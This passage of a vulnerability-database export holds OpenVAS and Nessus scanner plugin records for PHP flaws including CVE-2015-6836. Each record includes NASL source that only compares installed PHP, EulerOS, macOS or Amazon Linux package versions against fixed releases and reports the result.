issue allow\n remote attackers to execute arbitrary code in the context of the user\n running the affected application. Failed exploit attempts will likely cause\n a denial-of-service condition.\");\n\n script_tag(name:\"affected\", value:\"PHP versions before 5.4.45, 5.5.x before\n 5.5.29, and 5.6.x before 5.6.13 on Linux\");\n\n script_tag(name:\"solution\", value:\"Upgrade to PHP version 5.4.45, or 5.5.29, or\n 5.6.13 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n\n script_xref(name:\"URL\", value:\"http://www.php.net/ChangeLog-5.php\");\n script_xref(name:\"URL\", value:\"https://bugs.php.net/bug.php?id=70388\");\n\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_category(ACT_GATHER_INFO);\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_php_detect.nasl\", \"os_detection.nasl\");\n script_mandatory_keys(\"php/installed\", \"Host/runs_unixoide\");\n\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\nif( isnull( phpPort = get_app_port( cpe:CPE ) ) ) exit( 0 );\nif( ! phpVer = get_app_version( cpe:CPE, port:phpPort ) ) exit( 0 );\n\nif(version_is_less(version:phpVer, test_version:\"5.4.45\"))\n{\n fix = '5.4.45';\n VULN = TRUE;\n}\n\nelse if(phpVer =~ \"^5\\.6\")\n{\n if(version_is_less(version:phpVer, test_version:\"5.6.13\"))\n {\n fix = '5.6.13';\n VULN = TRUE;\n }\n}\n\nelse if(phpVer =~ \"^5\\.5\")\n{\n if(version_is_less(version:phpVer, test_version:\"5.5.29\"))\n {\n fix = '5.5.29';\n VULN = TRUE;\n }\n}\n\nif(VULN)\n{\n report = report_fixed_ver(installed_version:phpVer, fixed_version:fix);\n security_message(data:report, port:phpPort);\n exit(0);\n}\n\nexit(99);", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:35:34", "description": "This host is installed with PHP and is prone\n to remote code execution vulnerability.", "cvss3": {}, "published": "2016-03-01T00:00:00", "type": "openvas", "title": "PHP 'serialize_function_call' Function Type Confusion Vulnerability - Mar16 (Windows)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-6836"], "modified": "2018-11-15T00:00:00", "id": "OPENVAS:1361412562310807091", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310807091", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_php_type_confusion_rce_vuln_mar16_win.nasl 2016-03-01 16:56:54Z March$\n#\n# PHP 'serialize_function_call' Function Type Confusion Vulnerability - Mar16 (Windows)\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:php:php\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.807091\");\n script_version(\"$Revision: 12363 $\");\n script_cve_id(\"CVE-2015-6836\");\n script_bugtraq_id(76644);\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-15 10:51:15 +0100 (Thu, 15 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2016-03-01 16:56:54 +0530 (Tue, 01 Mar 2016)\");\n script_name(\"PHP 'serialize_function_call' Function Type Confusion Vulnerability - Mar16 (Windows)\");\n\n script_tag(name:\"summary\", value:\"This host is installed with PHP and is prone\n to remote code execution vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaw is due to 'SoapClient __call'\n method in 'ext/soap/soap.c' scripr does not properly manage headers.\");\n\n script_tag(name:\"impact\", value:\"Successfully exploiting this issue allow\n remote attackers to execute arbitrary code in the context of the user\n running the affected application. Failed exploit attempts will likely cause\n a denial-of-service condition.\");\n\n script_tag(name:\"affected\", value:\"PHP versions before 5.4.45, 5.5.x before\n 5.5.29, and 5.6.x before 5.6.13 on Windows\");\n\n script_tag(name:\"solution\", value:\"Upgrade to PHP version 5.4.45, or 5.5.29, or\n 5.6.13 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n\n script_xref(name:\"URL\", value:\"http://www.php.net/ChangeLog-5.php\");\n script_xref(name:\"URL\", value:\"https://bugs.php.net/bug.php?id=70388\");\n\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_category(ACT_GATHER_INFO);\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_php_detect.nasl\", \"os_detection.nasl\");\n script_mandatory_keys(\"php/installed\", \"Host/runs_windows\");\n\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\nif( isnull( phpPort = get_app_port( cpe:CPE ) ) ) exit( 0 );\nif( ! phpVer = get_app_version( cpe:CPE, port:phpPort ) ) exit( 0 );\n\nif(version_is_less(version:phpVer, test_version:\"5.4.45\"))\n{\n fix = '5.4.45';\n VULN = TRUE;\n}\n\nelse if(phpVer =~ \"^5\\.6\")\n{\n if(version_is_less(version:phpVer, test_version:\"5.6.13\"))\n {\n fix = '5.6.13';\n VULN = TRUE;\n }\n}\n\nelse if(phpVer =~ \"^5\\.5\")\n{\n if(version_is_less(version:phpVer, test_version:\"5.5.29\"))\n {\n fix = '5.5.29';\n VULN = TRUE;\n }\n}\n\nif(VULN)\n{\n report = report_fixed_ver(installed_version:phpVer, fixed_version:fix);\n security_message(data:report, port:phpPort);\n exit(0);\n}\n\nexit(99);", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-01-27T18:34:23", "description": "The remote host is missing an update for the Huawei EulerOS\n ", "cvss3": {}, "published": "2020-01-23T00:00:00", "type": "openvas", "title": "Huawei EulerOS: Security Advisory for php (EulerOS-SA-2019-1543)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-2348", "CVE-2015-2787", "CVE-2015-0232", "CVE-2015-2783", "CVE-2015-8873", "CVE-2015-3329", "CVE-2015-6834", "CVE-2015-0273", "CVE-2014-8142", "CVE-2015-4025", "CVE-2014-3669", "CVE-2014-5120", "CVE-2014-3597", "CVE-2015-6836", "CVE-2015-4026", "CVE-2014-4721", "CVE-2015-4022", "CVE-2015-6837", "CVE-2015-6835", "CVE-2015-4643"], "modified": "2020-01-23T00:00:00", "id": "OPENVAS:1361412562311220191543", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562311220191543", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.1.2.2019.1543\");\n script_version(\"2020-01-23T12:09:56+0000\");\n script_cve_id(\"CVE-2014-3597\", \"CVE-2014-3669\", \"CVE-2014-4721\", \"CVE-2014-5120\", \"CVE-2014-8142\", \"CVE-2015-0232\", \"CVE-2015-0273\", \"CVE-2015-2348\", \"CVE-2015-2783\", \"CVE-2015-2787\", \"CVE-2015-3329\", \"CVE-2015-4022\", \"CVE-2015-4025\", \"CVE-2015-4026\", \"CVE-2015-4643\", \"CVE-2015-6834\", \"CVE-2015-6835\", \"CVE-2015-6836\", \"CVE-2015-6837\", \"CVE-2015-8873\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-01-23 12:09:56 +0000 (Thu, 23 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-23 12:09:56 +0000 (Thu, 23 Jan 2020)\");\n script_name(\"Huawei EulerOS: Security Advisory for php (EulerOS-SA-2019-1543)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei EulerOS Local Security Checks\");\n script_dependencies(\"gb_huawei_euleros_consolidation.nasl\");\n script_mandatory_keys(\"ssh/login/euleros\", \"ssh/login/rpms\", re:\"ssh/login/release=EULEROSVIRT-3\\.0\\.1\\.0\");\n\n script_xref(name:\"EulerOS-SA\", value:\"2019-1543\");\n script_xref(name:\"URL\", value:\"https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2019-1543\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the Huawei EulerOS\n 'php' package(s) announced via the EulerOS-SA-2019-1543 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"A flaws was discovered in the way PHP performed object unserialization. Specially crafted input processed by the unserialize() function could cause a PHP application to crash or, possibly, execute arbitrary code.(CVE-2014-8142)\n\nIt was found that certain PHP functions did not properly handle file names containing a NULL character. A remote attacker could possibly use this flaw to make a PHP script access unexpected files and bypass intended file system access restrictions.(CVE-2015-4026)\n\nA flaw was discovered in the way PHP performed object unserialization. Specially crafted input processed by the unserialize() function could cause a PHP application to crash or, possibly, execute arbitrary code.(CVE-2015-6834)\n\nIt was found that certain PHP functions did not properly handle file names containing a NULL character. A remote attacker could possibly use this flaw to make a PHP script access unexpected files and bypass intended file system access restrictions.(CVE-2015-4025)\n\nAn integer overflow flaw was found in the way custom objects were unserialized. Specially crafted input processed by the unserialize() function could cause a PHP application to crash.(CVE-2014-3669)\n\nIt was found that PHP move_uploaded_file() function did not properly handle file names with a NULL character. A remote attacker could possibly use this flaw to make a PHP script access unexpected files and bypass intended file system access restrictions.(CVE-2015-2348)\n\nAn integer overflow flaw leading to a heap-based buffer overflow was found in the way PHP's FTP extension parsed file listing FTP server responses. A malicious FTP server could use this flaw to cause a PHP application to crash or, possibly, execute arbitrary code.(CVE-2015-4022)\n\nA flaw was discovered in the way PHP performed object unserialization. Specially crafted input processed by the unserialize() function could cause a PHP application to crash or, possibly, execute arbitrary code.(CVE-2015-6836)\n\nA NULL pointer dereference flaw was found in the XSLTProcessor class in PHP. An attacker could use this flaw to cause a PHP application to crash if it performed Extensible Stylesheet Language (XSL) transformations using untrusted XSLT files and allowed the use of PHP functions to be used as XSLT functions within XSL stylesheets.(CVE-2015-6837)\n\nIt was found that PHP's gd extension did not properly handle file names with a null character. A remote attacker could possibly use this flaw to make a PHP application access unexpected files and bypass intended file system access restrictions.(CVE-2014-5120)\n\nA flaw was discovered in the way PHP performed obj ...\n\n Description truncated. Please see the references for more information.\");\n\n script_tag(name:\"affected\", value:\"'php' package(s) on Huawei EulerOS Virtualization 3.0.1.0.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"EULEROSVIRT-3.0.1.0\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"php\", rpm:\"php~5.4.16~45.h9\", rls:\"EULEROSVIRT-3.0.1.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php-cli\", rpm:\"php-cli~5.4.16~45.h9\", rls:\"EULEROSVIRT-3.0.1.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php-common\", rpm:\"php-common~5.4.16~45.h9\", rls:\"EULEROSVIRT-3.0.1.0\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-02-11T15:39:06", "description": "This host is running Apple Mac OS X and\n is prone to multiple vulnerabilities.", "cvss3": {}, "published": "2018-05-15T00:00:00", "type": "openvas", "title": "Apple Mac OS X Multiple Vulnerabilities-01 (HT205375)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-6976", "CVE-2015-6980", "CVE-2015-0235", "CVE-2015-5927", "CVE-2015-7003", "CVE-2015-5924", "CVE-2015-5939", "CVE-2015-6834", "CVE-2015-6991", "CVE-2015-6992", "CVE-2015-6977", "CVE-2015-7024", "CVE-2015-5934", "CVE-2015-5940", "CVE-2015-0273", "CVE-2014-4860", "CVE-2015-6978", "CVE-2015-7018", "CVE-2015-6985", "CVE-2015-7010", "CVE-2015-6984", "CVE-2015-5937", "CVE-2015-6993", "CVE-2015-6836", "CVE-2015-5936", "CVE-2015-5942", "CVE-2015-7009", "CVE-2015-6996", "CVE-2015-6837", "CVE-2015-5925", "CVE-2015-6835", "CVE-2015-5926", "CVE-2015-6838", "CVE-2015-5933"], "modified": "2020-02-11T00:00:00", "id": "OPENVAS:1361412562310813191", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310813191", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Apple Mac OS X Multiple Vulnerabilities-01 (HT205375)\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.813191\");\n script_version(\"2020-02-11T08:37:57+0000\");\n script_cve_id(\"CVE-2014-4860\", \"CVE-2015-0235\", \"CVE-2015-0273\", \"CVE-2015-5924\",\n \"CVE-2015-5925\", \"CVE-2015-5926\", \"CVE-2015-5927\", \"CVE-2015-5933\",\n \"CVE-2015-5934\", \"CVE-2015-5936\", \"CVE-2015-5937\", \"CVE-2015-5939\",\n \"CVE-2015-5940\", \"CVE-2015-5942\", \"CVE-2015-6834\", \"CVE-2015-6835\",\n \"CVE-2015-6836\", \"CVE-2015-6837\", \"CVE-2015-6838\", \"CVE-2015-6976\",\n \"CVE-2015-6977\", \"CVE-2015-6978\", \"CVE-2015-6980\", \"CVE-2015-6984\",\n \"CVE-2015-6985\", \"CVE-2015-6991\", \"CVE-2015-6992\", \"CVE-2015-6993\",\n \"CVE-2015-6996\", \"CVE-2015-7003\", \"CVE-2015-7009\", \"CVE-2015-7010\",\n \"CVE-2015-7018\", \"CVE-2015-7024\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-02-11 08:37:57 +0000 (Tue, 11 Feb 2020)\");\n script_tag(name:\"creation_date\", value:\"2018-05-15 15:17:32 +0530 (Tue, 15 May 2018)\");\n script_name(\"Apple Mac OS X Multiple Vulnerabilities-01 (HT205375)\");\n\n script_tag(name:\"summary\", value:\"This host is running Apple Mac OS X and\n is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists. For details refer\n reference section.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attacker\n to execute arbitrary code, unexpected application termination, exercise unused\n EFI functions, overwrite arbitrary files and load arbitrary files.\");\n\n script_tag(name:\"affected\", value:\"Apple Mac OS X versions 10.9.x through\n 10.9.5 prior to build 13F1134, 10.10.x through 10.10.5 prior to build 14F1021,\n and 10.11.x prior to 10.11.1\");\n\n script_tag(name:\"solution\", value:\"Upgrade 10.11.x Apple Mac OS X to version\n 10.11.1 or apply the appropriate patch for 10.10.x and 10.9.x Apple Mac OS X\n versions. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"https://support.apple.com/en-us/HT205375\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Mac OS X Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/osx_name\", \"ssh/login/osx_version\", re:\"ssh/login/osx_version=^10\\.(9|1[01])\");\n exit(0);\n}\n\ninclude(\"version_func.inc\");\n\nosName = get_kb_item(\"ssh/login/osx_name\");\nif(!osName || \"Mac OS X\" >!< osName){\n exit(0);\n}\n\nosVer = get_kb_item(\"ssh/login/osx_version\");\nif(!osVer || osVer !~ \"^10\\.(9|1[01])\"){\n exit(0);\n}\n\nif(osVer =~ \"^10\\.(9|10)\")\n{\n if(version_in_range(version:osVer, test_version:\"10.9\", test_version2:\"10.9.4\") ||\n version_in_range(version:osVer, test_version:\"10.10\", test_version2:\"10.10.4\")){\n fix = \"Upgrade to latest OS release and apply patch from vendor\";\n }\n\n else if(osVer == \"10.9.5\" || osVer == \"10.10.5\")\n {\n buildVer = get_kb_item(\"ssh/login/osx_build\");\n if(buildVer)\n {\n if((osVer == \"10.9.5\" && version_is_less(version:buildVer, test_version:\"13F1134\")) ||\n (osVer == \"10.10.5\" && version_is_less(version:buildVer, test_version:\"14F1021\")))\n {\n fix = \"Apply patch from vendor\";\n osVer = osVer + \" Build \" + buildVer;\n }\n }\n }\n}\n\nelse if(osVer =~ \"^10\\.11\" && version_is_less(version:osVer, test_version:\"10.11.1\")){\n fix = \"10.11.1\";\n}\n\nif(fix)\n{\n report = report_fixed_ver(installed_version:osVer, fixed_version:fix);\n security_message(data:report);\n exit(0);\n}\n\nexit(99);", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2021-10-16T01:30:44", "description": "A NULL pointer dereference flaw was found in the XSLTProcessor class in PHP. An attacker could use this flaw to cause a PHP application to crash if it performed Extensible Stylesheet Language (XSL) transformations using untrusted XSLT files and allowed the use of PHP functions to be used as XSLT functions within XSL stylesheets.\n(CVE-2015-6837 , CVE-2015-6838)\n\nA flaw was discovered in the way PHP performed object unserialization.\nSpecially crafted input processed by the unserialize() function could cause a PHP application to crash or, possibly, execute arbitrary code.\n(CVE-2015-6834 , CVE-2015-6835 , CVE-2015-6836)", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-03-17T00:00:00", "type": "nessus", "title": "Amazon Linux AMI : php54 (ALAS-2016-670)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-6834", "CVE-2015-6835", "CVE-2015-6836", "CVE-2015-6837", "CVE-2015-6838"], "modified": "2019-04-11T00:00:00", "cpe": ["p-cpe:/a:amazon:linux:php54", "p-cpe:/a:amazon:linux:php54-bcmath", "p-cpe:/a:amazon:linux:php54-cli", "p-cpe:/a:amazon:linux:php54-common", "p-cpe:/a:amazon:linux:php54-dba", "p-cpe:/a:amazon:linux:php54-debuginfo", "p-cpe:/a:amazon:linux:php54-devel", "p-cpe:/a:amazon:linux:php54-embedded", "p-cpe:/a:amazon:linux:php54-enchant", "p-cpe:/a:amazon:linux:php54-fpm", "p-cpe:/a:amazon:linux:php54-gd", "p-cpe:/a:amazon:linux:php54-imap", "p-cpe:/a:amazon:linux:php54-intl", "p-cpe:/a:amazon:linux:php54-ldap", "p-cpe:/a:amazon:linux:php54-mbstring", "p-cpe:/a:amazon:linux:php54-mcrypt", "p-cpe:/a:amazon:linux:php54-mssql", "p-cpe:/a:amazon:linux:php54-mysql", "p-cpe:/a:amazon:linux:php54-mysqlnd", "p-cpe:/a:amazon:linux:php54-odbc", "p-cpe:/a:amazon:linux:php54-pdo", "p-cpe:/a:amazon:linux:php54-pgsql", "p-cpe:/a:amazon:linux:php54-process", "p-cpe:/a:amazon:linux:php54-pspell", "p-cpe:/a:amazon:linux:php54-recode", "p-cpe:/a:amazon:linux:php54-snmp", "p-cpe:/a:amazon:linux:php54-soap", "p-cpe:/a:amazon:linux:php54-tidy", "p-cpe:/a:amazon:linux:php54-xml", "p-cpe:/a:amazon:linux:php54-xmlrpc", "cpe:/o:amazon:linux"], "id": "ALA_ALAS-2016-670.NASL", "href": "https://www.tenable.com/plugins/nessus/89967", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux AMI Security Advisory ALAS-2016-670.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(89967);\n script_version(\"2.4\");\n script_cvs_date(\"Date: 2019/04/11 17:23:06\");\n\n script_cve_id(\"CVE-2015-6834\", \"CVE-2015-6835\", \"CVE-2015-6836\", \"CVE-2015-6837\", \"CVE-2015-6838\");\n script_xref(name:\"ALAS\", value:\"2016-670\");\n\n script_name(english:\"Amazon Linux AMI : php54 (ALAS-2016-670)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Amazon Linux AMI host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A NULL pointer dereference flaw was found in the XSLTProcessor class\nin PHP. An attacker could use this flaw to cause a PHP application to\ncrash if it performed Extensible Stylesheet Language (XSL)\ntransformations using untrusted XSLT files and allowed the use of PHP\nfunctions to be used as XSLT functions within XSL stylesheets.\n(CVE-2015-6837 , CVE-2015-6838)\n\nA flaw was discovered in the way PHP performed object unserialization.\nSpecially crafted input processed by the unserialize() function could\ncause a PHP application to crash or, possibly, execute arbitrary code.\n(CVE-2015-6834 , CVE-2015-6835 , CVE-2015-6836)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://alas.aws.amazon.com/ALAS-2016-670.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Run 'yum update php54' to update your system.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php54\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php54-bcmath\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php54-cli\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php54-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php54-dba\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php54-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php54-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php54-embedded\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php54-enchant\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php54-fpm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php54-gd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php54-imap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php54-intl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php54-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php54-mbstring\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php54-mcrypt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php54-mssql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php54-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php54-mysqlnd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php54-odbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php54-pdo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php54-pgsql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php54-process\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php54-pspell\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php54-recode\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php54-snmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php54-soap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php54-tidy\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php54-xml\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php54-xmlrpc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/03/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/03/17\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nos_ver = pregmatch(pattern: \"^AL(A|\\d)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nos_ver = os_ver[1];\nif (os_ver != \"A\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux AMI\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (rpm_check(release:\"ALA\", reference:\"php54-5.4.45-1.75.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php54-bcmath-5.4.45-1.75.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php54-cli-5.4.45-1.75.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php54-common-5.4.45-1.75.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php54-dba-5.4.45-1.75.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php54-debuginfo-5.4.45-1.75.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php54-devel-5.4.45-1.75.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php54-embedded-5.4.45-1.75.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php54-enchant-5.4.45-1.75.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php54-fpm-5.4.45-1.75.amzn1\")) flag++;\nif 